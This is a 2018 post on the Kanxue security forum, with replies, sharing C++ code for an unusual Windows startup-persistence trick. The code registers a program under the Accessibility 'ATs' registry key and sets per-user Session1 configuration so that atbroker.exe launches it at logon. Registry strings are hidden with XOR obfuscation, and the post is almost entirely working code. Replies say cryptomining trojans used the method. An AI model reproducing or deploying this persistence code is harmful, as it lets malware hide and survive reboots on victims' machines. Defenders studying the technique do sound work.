[分享]很有时间系列：一种比较奇怪的启动方法-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[分享]很有时间系列：一种比较奇怪的启动方法

2018-5-18 16:23 8791

[分享]很有时间系列：一种比较奇怪的启动方法

cvcvxk

2018-5-18 16:23

8791

//代码请勿用于违反当地法律的事情，代码仅供研究使用
//想吹水就来QQ群：48715131

通过比较奇怪的注册表达到开机启动的目的。

开机登陆后由atbroker.exe作为一个启动程序来启动第二步的程序。

//利用代码,boot.exe是要开机启动的程序
install_ATs(_T("C:\\boot.exe"),_T("7777777"));

效果：

具体写注册代码如下：（XorStringW来自https://github.com/Tai7sy/vs-obfuscation）

int get_rand(std::size_t _min,std::size_t _max)
{
	std::random_device                 r;
	std::mt19937                       rand(r());
	std::uniform_int_distribution<int> uniform_dist(_min, _max);
	return uniform_dist(rand);
}
bool install_ATs(LPCTSTR ExePath, LPCTSTR Arg)
{
	//ATS安装exe持久化
	//HKEY_LOCAL_MACHINE
	//SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
	HKEY hKey = nullptr;
	HKEY hKey1 = nullptr;
	HKEY hKey2 = nullptr;
	auto exit_sope = std::experimental::make_scope_exit([&]() {
		RegCloseKey(hKey);
		RegCloseKey(hKey1);
		RegCloseKey(hKey2);
	});
	do {
		auto status = RegOpenKeyExW(
			HKEY_LOCAL_MACHINE,
			XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"),
			0,
			KEY_ALL_ACCESS,
			&hKey);
		if (status != ERROR_SUCCESS)
		{
			break;
		}
		//随机名字
		WCHAR *pRandArray = XorStringW(L"qwertyuiopasdfghjklzxcvbnm1234567890");
		WCHAR newName[8] = {};
		for (auto i=0;i<RTL_NUMBER_OF(newName)-1;i++)
		{
			newName[i] = pRandArray[get_rand(0, wcslen(pRandArray))];
		}
		//创建子健
		status = RegCreateKeyEx(hKey,
			newName, 
			0,
			nullptr,
			REG_OPTION_NON_VOLATILE,
			KEY_ALL_ACCESS, 
			nullptr,
			&hKey1,
			nullptr);
		if (status!=ERROR_SUCCESS)
		{
			break;
		}
		status = RegSetValueExW(hKey1, XorStringW(L"StartExe"),
			0, REG_SZ, (const BYTE*)ExePath, (DWORD)(sizeof(TCHAR)*(_tcslen(ExePath) + 1)));
		if (status!=ERROR_SUCCESS)
		{
			break;
		}
		status = RegSetValueExW(hKey1, XorStringW(L"StartParams"),
			0, REG_SZ, (const BYTE*)Arg, (DWORD)(sizeof(TCHAR)*(_tcslen(Arg) + 1)));
		if (status != ERROR_SUCCESS)
		{
			break;
		}
		//SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session1
		status = RegCreateKeyEx(HKEY_CURRENT_USER,
			XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility"),
			0,
			nullptr,
			REG_OPTION_NON_VOLATILE,
			KEY_ALL_ACCESS,
			nullptr,
			&hKey2,
			nullptr);
		if (status!=ERROR_SUCCESS)
		{
			break;
		}
		status = RegSetValueExW(hKey2, XorStringW(L"Configuration"),
			0, REG_SZ, (const BYTE*)newName, sizeof(newName));
		if (status != ERROR_SUCCESS)
		{
			break;
		}
		RegCloseKey(hKey2);
		status = RegCreateKeyEx(HKEY_CURRENT_USER,
			XorStringW(L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session1"),
			0,
			nullptr,
			REG_OPTION_NON_VOLATILE,
			KEY_ALL_ACCESS,
			nullptr,
			&hKey2,
			nullptr);
		if (status!=ERROR_SUCCESS)
		{
			break;
		}
		status = RegSetValueExW(hKey2, XorStringW(L"Configuration"),
			0, REG_SZ, (const BYTE*)newName, sizeof(newName));
		if (status != ERROR_SUCCESS)
		{
			break;
		}
		return true;
	} while (0);

	return false;
}

效果一般般，只是这个启动点比较不常见。

阿里云助力开发者！2核2G 3M带宽不限流量！6.18限时价，开发者可享99元/年，续费同价！

最后于 2018-5-18 17:04 被cvcvxk编辑，原因：贴图，补充缺少的一句代码

收藏・38

点赞・1

打赏

最新回复 (14)
PYGame 雪币： 2473 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 311 粉丝 2 关注私信	PYGame 2018-5-18 17:46 2 楼 0 66666666 win通用吗
cvcvxk 雪币： 8863 活跃值： (2374) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 228 关注私信	cvcvxk 10 2018-5-18 17:52 3 楼 0 PYGame 66666666 win通用吗自行测试
chinasmu 雪币： 5493 活跃值： (2608) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 200 粉丝 2 关注私信	chinasmu 2018-5-21 15:11 4 楼 0 吹水也要付费啊
wowocock 雪币： 405 活跃值： (1950) 能力值： ( LV4，RANK：50 ) 在线值：发帖 4 回帖 297 粉丝 19 关注私信	wowocock 1 2018-5-21 16:33 5 楼 0 前几天报道有木马利用这个来挖矿，现在各大杀软开始对其严防死守了。
cvcvxk 雪币： 8863 活跃值： (2374) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 228 关注私信	cvcvxk 10 2018-5-21 21:51 6 楼 0 wowocock 前几天报道有木马利用这个来挖矿，现在各大杀软开始对其严防死守了。是的，已经死了。
Justgoon 雪币： 547 活跃值： (770) 能力值： ( LV5，RANK：70 ) 在线值：发帖 5 回帖 45 粉丝 39 关注私信	Justgoon 1 2018-5-23 16:30 7 楼 0 win8以上能用-，-
工程雪币： 87 活跃值： (200) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 91 粉丝 0 关注私信	工程 2018-5-29 14:19 8 楼 0
猪会被杀掉雪币： 18 活跃值： (979) 能力值： ( LV7，RANK：110 ) 在线值：发帖 32 回帖 506 粉丝 42 关注私信	猪会被杀掉 1 2018-5-29 14:30 9 楼 0 感谢，对文中的XorStringW比较感兴趣。
BlackJZero 雪币： 2694 活跃值： (80) 能力值： ( LV2，RANK：15 ) 在线值：发帖 0 回帖 102 粉丝 5 关注私信	BlackJZero 2018-5-29 21:59 10 楼 0
EXHades 雪币： 119 活跃值： (259) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 22 粉丝 1 关注私信	EXHades 2018-5-29 22:56 11 楼 0 666
路易雪币： 6 活跃值： (841) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 92 粉丝 1 关注私信	路易 2018-6-26 10:49 12 楼 0 群现在要钱加入了。。。以前表妹在的时候是免费的
gabpfiugdu 雪币： 89 活跃值： (23) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 24 粉丝 0 关注私信	gabpfiugdu 2018-6-27 02:03 13 楼 0 这个挖矿木马如何手动处理
chunklu 雪币： 42 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	chunklu 2018-10-8 16:37 14 楼 0 XorStringW是个好东西
wanalj 雪币： 4 能力值： (RANK：10 ) 在线值：发帖 0 回帖 18 粉丝 0 关注私信	wanalj 2018-11-5 20:52 15 楼 0 可以加你微信吗?
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

cvcvxk

125

发帖

3095

回帖

760

RANK

关注

私信

他的文章

[分享]不小心看到系列：IFEO的另一个使用方式

[分享]很有时间系列：一种比较奇怪的启动方法

[分享]很有时间系列：不用inf安装ndis filter驱动

[分享]很有时间系列：解决noimage驱动注册Minifilter的问题

关于我们

联系我们

企业服务

看雪公众号

最新回复 (14)
PYGame 雪币： 2473 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 311 粉丝 2 关注私信	PYGame 2018-5-18 17:46 2 楼 0 66666666 win通用吗
cvcvxk 雪币： 8863 活跃值： (2374) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 228 关注私信	cvcvxk 10 2018-5-18 17:52 3 楼 0 PYGame 66666666 win通用吗自行测试
chinasmu 雪币： 5493 活跃值： (2608) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 200 粉丝 2 关注私信	chinasmu 2018-5-21 15:11 4 楼 0 吹水也要付费啊
wowocock 雪币： 405 活跃值： (1950) 能力值： ( LV4，RANK：50 ) 在线值：发帖 4 回帖 297 粉丝 19 关注私信	wowocock 1 2018-5-21 16:33 5 楼 0 前几天报道有木马利用这个来挖矿，现在各大杀软开始对其严防死守了。
cvcvxk 雪币： 8863 活跃值： (2374) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 228 关注私信	cvcvxk 10 2018-5-21 21:51 6 楼 0 wowocock 前几天报道有木马利用这个来挖矿，现在各大杀软开始对其严防死守了。是的，已经死了。
Justgoon 雪币： 547 活跃值： (770) 能力值： ( LV5，RANK：70 ) 在线值：发帖 5 回帖 45 粉丝 39 关注私信	Justgoon 1 2018-5-23 16:30 7 楼 0 win8以上能用-，-
工程雪币： 87 活跃值： (200) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 91 粉丝 0 关注私信	工程 2018-5-29 14:19 8 楼 0
猪会被杀掉雪币： 18 活跃值： (979) 能力值： ( LV7，RANK：110 ) 在线值：发帖 32 回帖 506 粉丝 42 关注私信	猪会被杀掉 1 2018-5-29 14:30 9 楼 0 感谢，对文中的XorStringW比较感兴趣。
BlackJZero 雪币： 2694 活跃值： (80) 能力值： ( LV2，RANK：15 ) 在线值：发帖 0 回帖 102 粉丝 5 关注私信	BlackJZero 2018-5-29 21:59 10 楼 0
EXHades 雪币： 119 活跃值： (259) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 22 粉丝 1 关注私信	EXHades 2018-5-29 22:56 11 楼 0 666
路易雪币： 6 活跃值： (841) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 92 粉丝 1 关注私信	路易 2018-6-26 10:49 12 楼 0 群现在要钱加入了。。。以前表妹在的时候是免费的
gabpfiugdu 雪币： 89 活跃值： (23) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 24 粉丝 0 关注私信	gabpfiugdu 2018-6-27 02:03 13 楼 0 这个挖矿木马如何手动处理
chunklu 雪币： 42 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	chunklu 2018-10-8 16:37 14 楼 0 XorStringW是个好东西
wanalj 雪币： 4 能力值： (RANK：10 ) 在线值：发帖 0 回帖 18 粉丝 0 关注私信	wanalj 2018-11-5 20:52 15 楼 0 可以加你微信吗?
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复